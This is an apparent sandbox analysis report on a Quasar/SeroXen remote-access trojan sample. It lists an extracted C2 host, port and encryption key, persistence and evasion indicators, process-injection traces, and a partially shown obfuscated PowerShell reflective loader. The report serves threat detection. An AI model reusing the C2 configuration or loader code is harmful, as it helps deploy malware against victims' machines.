Analysis
-
max time kernel
114s -
max time network
115s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
12-05-2024 07:55
Behavioral task
behavioral1
Sample
Uni.exe
Resource
win7-20240508-en
Errors
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
4c2bb0618a6eda615c8001d5a7ccd6c0
-
SHA1
c88d2c8bfc5906a5cfef78893d1132edcffd71f0
-
SHA256
abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
-
SHA512
6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
-
SSDEEP
12288:rpg6M1i1v6q1ak/e7xlX7nnvGAwhJLJO:lxqiii6xlLvGjhO
Malware Config
Extracted
quasar
3.1.5
SeroXen
tue-jake.gl.at.ply.gg:29058
$Sxr-xPAuDxLNyBmZ7S2WLJ
-
encryption_key
Pw78RUs175dFrKD7lMwH
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
SeroXen
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1588-1-0x0000000000E30000-0x0000000000E9C000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\SubDir\Client.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4288 created 616 4288 powershell.EXE winlogon.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 3 IoCs
Processes:
Client.exeinstall.exenUYVVSgTogoI.exepid process 464 Client.exe 4652 install.exe 2384 nUYVVSgTogoI.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
nUYVVSgTogoI.exedescription ioc process File opened for modification \??\PhysicalDrive0 nUYVVSgTogoI.exe -
Drops file in System32 directory 7 IoCs
Processes:
powershell.EXEsvchost.exesvchost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4288 set thread context of 4828 4288 powershell.EXE dllhost.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeSCHTASKS.exepid process 3924 schtasks.exe 5060 schtasks.exe 5008 SCHTASKS.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 53 IoCs
Processes:
powershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715500618" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE -
Modifies registry class 4 IoCs
Processes:
RuntimeBroker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exeClient.exepid process 4288 powershell.EXE 4288 powershell.EXE 4288 powershell.EXE 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 464 Client.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 464 Client.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe 4828 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Uni.exeClient.exepowershell.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 1588 Uni.exe Token: SeDebugPrivilege 464 Client.exe Token: SeDebugPrivilege 4288 powershell.EXE Token: SeDebugPrivilege 4288 powershell.EXE Token: SeDebugPrivilege 4828 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2068 svchost.exe Token: SeIncreaseQuotaPrivilege 2068 svchost.exe Token: SeSecurityPrivilege 2068 svchost.exe Token: SeTakeOwnershipPrivilege 2068 svchost.exe Token: SeLoadDriverPrivilege 2068 svchost.exe Token: SeSystemtimePrivilege 2068 svchost.exe Token: SeBackupPrivilege 2068 svchost.exe Token: SeRestorePrivilege 2068 svchost.exe Token: SeShutdownPrivilege 2068 svchost.exe Token: SeSystemEnvironmentPrivilege 2068 svchost.exe Token: SeUndockPrivilege 2068 svchost.exe Token: SeManageVolumePrivilege 2068 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2068 svchost.exe Token: SeIncreaseQuotaPrivilege 2068 svchost.exe Token: SeSecurityPrivilege 2068 svchost.exe Token: SeTakeOwnershipPrivilege 2068 svchost.exe Token: SeLoadDriverPrivilege 2068 svchost.exe Token: SeSystemtimePrivilege 2068 svchost.exe Token: SeBackupPrivilege 2068 svchost.exe Token: SeRestorePrivilege 2068 svchost.exe Token: SeShutdownPrivilege 2068 svchost.exe Token: SeSystemEnvironmentPrivilege 2068 svchost.exe Token: SeUndockPrivilege 2068 svchost.exe Token: SeManageVolumePrivilege 2068 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2068 svchost.exe Token: SeIncreaseQuotaPrivilege 2068 svchost.exe Token: SeSecurityPrivilege 2068 svchost.exe Token: SeTakeOwnershipPrivilege 2068 svchost.exe Token: SeLoadDriverPrivilege 2068 svchost.exe Token: SeSystemtimePrivilege 2068 svchost.exe Token: SeBackupPrivilege 2068 svchost.exe Token: SeRestorePrivilege 2068 svchost.exe Token: SeShutdownPrivilege 2068 svchost.exe Token: SeSystemEnvironmentPrivilege 2068 svchost.exe Token: SeUndockPrivilege 2068 svchost.exe Token: SeManageVolumePrivilege 2068 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2068 svchost.exe Token: SeIncreaseQuotaPrivilege 2068 svchost.exe Token: SeSecurityPrivilege 2068 svchost.exe Token: SeTakeOwnershipPrivilege 2068 svchost.exe Token: SeLoadDriverPrivilege 2068 svchost.exe Token: SeSystemtimePrivilege 2068 svchost.exe Token: SeBackupPrivilege 2068 svchost.exe Token: SeRestorePrivilege 2068 svchost.exe Token: SeShutdownPrivilege 2068 svchost.exe Token: SeSystemEnvironmentPrivilege 2068 svchost.exe Token: SeUndockPrivilege 2068 svchost.exe Token: SeManageVolumePrivilege 2068 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2068 svchost.exe Token: SeIncreaseQuotaPrivilege 2068 svchost.exe Token: SeSecurityPrivilege 2068 svchost.exe Token: SeTakeOwnershipPrivilege 2068 svchost.exe Token: SeLoadDriverPrivilege 2068 svchost.exe Token: SeSystemtimePrivilege 2068 svchost.exe Token: SeBackupPrivilege 2068 svchost.exe Token: SeRestorePrivilege 2068 svchost.exe Token: SeShutdownPrivilege 2068 svchost.exe Token: SeSystemEnvironmentPrivilege 2068 svchost.exe Token: SeUndockPrivilege 2068 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Client.exepid process 464 Client.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Uni.exeClient.exepowershell.EXEdllhost.exedescription pid process target process PID 1588 wrote to memory of 3924 1588 Uni.exe schtasks.exe PID 1588 wrote to memory of 3924 1588 Uni.exe schtasks.exe PID 1588 wrote to memory of 3924 1588 Uni.exe schtasks.exe PID 1588 wrote to memory of 464 1588 Uni.exe Client.exe PID 1588 wrote to memory of 464 1588 Uni.exe Client.exe PID 1588 wrote to memory of 464 1588 Uni.exe Client.exe PID 464 wrote to memory of 5060 464 Client.exe schtasks.exe PID 464 wrote to memory of 5060 464 Client.exe schtasks.exe PID 464 wrote to memory of 5060 464 Client.exe schtasks.exe PID 1588 wrote to memory of 4652 1588 Uni.exe install.exe PID 1588 wrote to memory of 4652 1588 Uni.exe install.exe PID 1588 wrote to memory of 4652 1588 Uni.exe install.exe PID 1588 wrote to memory of 5008 1588 Uni.exe SCHTASKS.exe PID 1588 wrote to memory of 5008 1588 Uni.exe SCHTASKS.exe PID 1588 wrote to memory of 5008 1588 Uni.exe SCHTASKS.exe PID 4288 wrote to memory of 4828 4288 powershell.EXE dllhost.exe PID 4288 wrote to memory of 4828 4288 powershell.EXE dllhost.exe PID 4288 wrote to memory of 4828 4288 powershell.EXE dllhost.exe PID 4288 wrote to memory of 4828 4288 powershell.EXE dllhost.exe PID 4288 wrote to memory of 4828 4288 powershell.EXE dllhost.exe PID 4288 wrote to memory of 4828 4288 powershell.EXE dllhost.exe PID 4288 wrote to memory of 4828 4288 powershell.EXE dllhost.exe PID 4288 wrote to memory of 4828 4288 powershell.EXE dllhost.exe PID 4828 wrote to memory of 616 4828 dllhost.exe winlogon.exe PID 4828 wrote to memory of 668 4828 dllhost.exe lsass.exe PID 4828 wrote to memory of 940 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1016 4828 dllhost.exe dwm.exe PID 4828 wrote to memory of 732 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 748 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1128 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1136 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1144 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1152 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1248 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1300 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1312 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1392 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1520 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1528 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1544 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1656 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1700 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1752 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1804 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1880 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1996 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 2008 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1508 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 1952 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 2068 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 2144 4828 dllhost.exe spoolsv.exe PID 4828 wrote to memory of 2240 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 2288 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 2540 4828 dllhost.exe sihost.exe PID 4828 wrote to memory of 2560 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 2576 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 2584 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 2764 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 2772 4828 dllhost.exe taskhostw.exe PID 4828 wrote to memory of 2808 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 2840 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 2848 4828 dllhost.exe sysmon.exe PID 4828 wrote to memory of 2880 4828 dllhost.exe svchost.exe PID 4828 wrote to memory of 2888 4828 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1016
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{cc324a1a-42d0-4b5a-832e-e221ec591320}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4828
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1144
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2772
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HetgjIEFfRmc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PVWdyiCzmAbCCq,[Parameter(Position=1)][Type]$OdYovBWWlc)$fjrMwgwDTuH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+'yD'+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'ublic'+','+''+'S'+'ea'+'l'+''+[Char](101)+''+'d'+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$fjrMwgwDTuH.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+'a'+''+'m'+'e'+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+'S'+'i'+''+[Char](103)+''+','+''+'P'+''+'u'+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$PVWdyiCzmAbCCq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');$fjrMwgwDTuH.DefineMethod(''+'I'+''+'n'+''+'v'+'o'+[Char](107)+''+'e'+'',''+'P'+'u'+[Char](98)+'l'+'i'+''+[Char](99)+','+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+',N'+[Char](101)+''+'w'+'S'+'l'+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$OdYovBWWlc,$PVWdyiCzmAbCCq).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'nag'+[Char](101)+''+[C